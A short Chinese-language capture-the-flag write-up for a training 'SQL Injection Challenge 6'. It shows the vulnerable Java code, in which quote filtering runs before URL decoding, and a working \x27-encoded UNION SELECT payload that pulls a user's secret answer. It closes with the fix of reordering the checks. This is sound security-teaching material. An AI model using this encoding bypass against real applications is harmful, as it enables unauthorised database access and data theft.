SQL Injection Challenge 6(SQL 注入 6)

题介绍

利用SQL注入点,获得通关密钥

功能实现

请求数据包

POST /challenges/d0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2 HTTP/1.1


pinNumber=1234

解析代码

userPin = userPin.replaceAll("\\\\", "\\\\\\\\").replaceAll("'", ""); // Escape single quotes
log.debug("userPin scrubbed - " + userPin);
userPin = java.net.URLDecoder.decode(userPin.replaceAll("\\\\\\\\x", "%"), "UTF-8"); //Decode \x encoding 
log.debug("searchTerm decoded to - " + userPin);
Connection conn = Database.getChallengeConnection(applicationRoot, "SqlChallengeSix");
log.debug("Looking for users");
PreparedStatement prepstmt = 
        conn.prepareStatement("SELECT userName FROM users WHERE userPin = '" + userPin + "'");
ResultSet users = prepstmt.executeQuery();

单引号被过滤了

但这个题会接收URL编码，因此绕过了第一步的单引号过滤

解题步骤

只需要使用\x27 代替单引号即可

\x27\x20UNION\x20SELECT\x20userAnswer\x20FROM\x20users\x20WHERE\x20userName\x20\x3D\x20\x27Brendan\x27\x3B\x20--\x20

总结

安全过滤的顺序非常的重要，如果将url解码和单引号过滤功能互换即可达到安全校验效果